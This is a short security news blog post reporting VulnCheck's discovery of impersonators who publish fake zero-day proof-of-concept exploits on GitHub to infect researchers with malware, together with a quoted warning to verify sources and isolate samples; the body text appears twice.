Since May, VulnCheck has observed hackers on Twitter and GitHub pretending to be cybersecurity researchers from ‘High Sierra Cyber Security’ and publishing fake PoC exploits for zero-day flaws in software like Chrome, Discord, Signal, WhatsApp, and Microsoft Exchange that infect Windows and Linux with malware.
Impersonators promote the GitHub repositories on Twitter and social media accounts that appear legitimate, with the users impersonating real security researchers from Rapid7, and other security firms, even using their real headshots.
In all cases, the malicious repositories host a Python script that acts as a malware downloader dropping a ZIP archive from an external URL to the legit cyber researcher’s computer.
While the success of this campaign is still unknown, VulnCheck notes that the threat actors are persistent, creating new accounts and repositories when the existing ones are reported and removed.
Avkash Kathiriya, SVP of Research and Innovation, Cyware had this to say:
“Researchers, like the rest of us, need to take zero trust seriously. It’s worth repeating these security 101 tenets: Don’t download questionable files from GitHub. Don’t install any sample malware in a system that is not isolated. Don’t trust what you see on Twitter. If you spend all day researching threats and scam techniques, don’t be surprised when you become the target.”
This advice can be boiled down to safe computing 101. Everyone needs to follow this advice to ensure that we don’t get pwned by a threat actor. And that includes defenders who are trying to get ahead of threat actors.
Like this:
Like Loading...
Related
This entry was posted on June 15, 2023 at 8:29 am and is filed under Commentary with tags VulnCheck. You can follow any responses to this entry through the RSS 2.0 feed.
You can leave a response, or trackback from your own site.
Fake Cyber Researchers Publish 0-day PoC’s to Push Malware
Since May, VulnCheck has observed hackers on Twitter and GitHub pretending to be cybersecurity researchers from ‘High Sierra Cyber Security’ and publishing fake PoC exploits for zero-day flaws in software like Chrome, Discord, Signal, WhatsApp, and Microsoft Exchange that infect Windows and Linux with malware.
Impersonators promote the GitHub repositories on Twitter and social media accounts that appear legitimate, with the users impersonating real security researchers from Rapid7, and other security firms, even using their real headshots.
In all cases, the malicious repositories host a Python script that acts as a malware downloader dropping a ZIP archive from an external URL to the legit cyber researcher’s computer.
While the success of this campaign is still unknown, VulnCheck notes that the threat actors are persistent, creating new accounts and repositories when the existing ones are reported and removed.
Avkash Kathiriya, SVP of Research and Innovation, Cyware had this to say:
“Researchers, like the rest of us, need to take zero trust seriously. It’s worth repeating these security 101 tenets: Don’t download questionable files from GitHub. Don’t install any sample malware in a system that is not isolated. Don’t trust what you see on Twitter. If you spend all day researching threats and scam techniques, don’t be surprised when you become the target.”
This advice can be boiled down to safe computing 101. Everyone needs to follow this advice to ensure that we don’t get pwned by a threat actor. And that includes defenders who are trying to get ahead of threat actors.
Share this:
Like this:
Related
This entry was posted on June 15, 2023 at 8:29 am and is filed under Commentary with tags VulnCheck. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.